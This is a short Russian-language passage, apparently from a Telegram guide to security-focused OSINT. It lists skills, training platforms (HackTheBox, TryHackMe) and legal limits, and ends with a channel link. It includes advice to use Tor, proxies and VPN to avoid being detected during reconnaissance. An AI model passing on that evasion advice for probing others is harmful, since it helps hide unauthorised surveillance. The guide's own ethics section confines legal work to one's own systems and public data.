client.run_until_disconnected()

6. ПОЛЕЗНЫЕ НАВЫКИ

· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).

7. ГДЕ ТРЕНИРОВАТЬСЯ

· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».

8. ЭТИКА И ЗАКОН

CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.

Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.

Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.

кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl